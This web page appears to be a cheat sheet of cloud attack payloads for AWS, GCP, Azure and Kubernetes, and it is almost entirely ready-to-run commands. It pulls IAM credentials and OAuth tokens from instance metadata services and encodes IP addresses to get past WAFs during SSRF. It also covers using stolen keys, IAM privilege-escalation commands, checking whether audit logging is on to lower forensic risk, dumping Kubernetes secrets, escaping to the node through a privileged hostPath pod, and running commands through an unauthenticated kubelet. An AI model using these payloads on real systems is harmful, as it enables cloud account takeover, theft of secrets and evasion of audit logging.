$loading...
Cloud attack payloads for AWS, GCP, Azure, and Kubernetes. SSRF-to-metadata exploitation, IAM credential theft, S3/Cloud Storage misconfigs, container escape, and Kubernetes service account abuse. (33 payloads)
curl http://169.254.169.254/latest/meta-data/curl http://169.254.169.254/latest/meta-data/iam/security-credentials/curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>curl http://169.254.169.254/latest/meta-data/hostname
curl http://169.254.169.254/latest/meta-data/public-hostname
curl http://169.254.169.254/latest/meta-data/public-ipv4
curl http://169.254.169.254/latest/meta-data/local-ipv4curl http://169.254.169.254/latest/user-datacurl http://169.254.169.254/latest/meta-data/instance-id
curl http://169.254.169.254/latest/meta-data/placement/region
curl http://169.254.169.254/latest/meta-data/placement/availability-zonecurl http://169.254.169.254/latest/meta-data/iam/info# Alternative IP encodings for SSRF WAF bypass:
curl http://2130706433/latest/meta-data/ # 169.254.169.254 decimal
curl http://0xa9fea9fe/latest/meta-data/ # hex
curl http://0251.0376.0251.0376/latest/meta-data/ # octal
curl http://169.254.169.254.nip.io/latest/meta-data/ # DNS redirect# Step 1: Get IMDSv2 session token (PUT request required)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Step 2: Use token for all requests
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/# IMDSv2 via SSRF — PUT with hop limit bypass:
# IMDSv2 PUT requires TTL > 1 (packet hop) from the instance itself
# If SSRF goes through a proxy that adds a hop, token request fails
# Bypass: if app follows redirects or allows custom headers:
curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
-H "X-Forwarded-For: 127.0.0.1" \
--max-redirs 3# Use stolen credentials with AWS CLI:
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>
export AWS_DEFAULT_REGION=<region>
# Verify identity:
aws sts get-caller-identity
# List accessible S3 buckets:
aws s3 ls
# List EC2 instances:
aws ec2 describe-instances# S3 bucket access check:
curl -s https://<bucket_name>.s3.amazonaws.com/
aws s3 ls s3://<bucket_name> --no-sign-request
aws s3 ls s3://<bucket_name> # authenticated# Common S3 bucket naming patterns to try:
<company_name>-backup
<company_name>-data
<company_name>-prod
<company_name>-dev
<company_name>-staging
<company_name>-logs
<company_name>-assets
<company_name>-config
<company_name>-secrets# IAM enumeration with stolen credentials:
aws iam get-user
aws iam list-attached-user-policies --user-name <user>
aws iam list-user-policies --user-name <user>
aws iam get-account-summary
aws sts get-caller-identity# IAM privilege escalation paths:
# If iam:CreatePolicyVersion:
aws iam create-policy-version --policy-arn <arn> --policy-document file://admin.json --set-as-default
# If iam:AttachUserPolicy:
aws iam attach-user-policy --user-name <user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# If iam:PassRole + ec2:RunInstances → create instance with privileged role# CloudTrail / logs check:
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail_name>
# If disabled → less forensic risk during operation# GCP IMDS requires Metadata-Flavor: Google header
curl -s "http://metadata.google.internal/computeMetadata/v1/" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" \
-H "Metadata-Flavor: Google"
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/project/project-id" \
-H "Metadata-Flavor: Google"
curl -s "http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id" \
-H "Metadata-Flavor: Google"curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/" \
-H "Metadata-Flavor: Google"
# Then retrieve each attribute:
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" \
-H "Metadata-Flavor: Google"
# kube-env on GKE nodes contains KUBELET_CERT, CA_CERT, and bootstrap tokens# Alternative GCP metadata IPs for SSRF bypass:
curl "http://metadata.google.internal/computeMetadata/v1/..." \
-H "Metadata-Flavor: Google"
curl "http://169.254.169.254/computeMetadata/v1/..." \
-H "Metadata-Flavor: Google"
curl "http://0x69fea9fe/computeMetadata/v1/" \
-H "Metadata-Flavor: Google"# Azure IMDS requires Metadata: true header
curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01"curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/"# Use Azure access token with REST API:
TOKEN=$(curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | python3 -c "import sys,json;print(json.load(sys.stdin)['access_token'])")
# List subscriptions:
curl -s -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01"# Service account token location:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt# Call K8s API server with service account token:
APISOURCE=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sSk -H "Authorization: Bearer $TOKEN" $APISOURCE/api/v1/namespaces
curl -sSk -H "Authorization: Bearer $TOKEN" $APISOURCE/api/v1/namespaces/default/secrets
curl -sSk -H "Authorization: Bearer $TOKEN" $APISOURCE/api/v1/namespaces/default/pods# Get all secrets in cluster (if permission allows):
curl -sSk -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/secrets | python3 -m json.tool# Create privileged pod for node escape:
curl -sSk -H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-X POST https://kubernetes.default.svc/api/v1/namespaces/default/pods \
-d '{"apiVersion":"v1","kind":"Pod","metadata":{"name":"escape"},"spec":{"containers":[{"name":"escape","image":"ubuntu","command":["/bin/bash","-c","chroot /host bash"],"volumeMounts":[{"mountPath":"/host","name":"host"}],"securityContext":{"privileged":true}}],"volumes":[{"name":"host","hostPath":{"path":"/"}}]}}'
# Pod creates with host filesystem mounted — chroot to escape# Kubelet API (often unauthenticated on port 10250):
curl -sk https://<NODE_IP>:10250/pods
curl -sk https://<NODE_IP>:10250/run/<namespace>/<pod>/<container> \
-d "cmd=id"
# Execute commands in any pod on that node without authLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides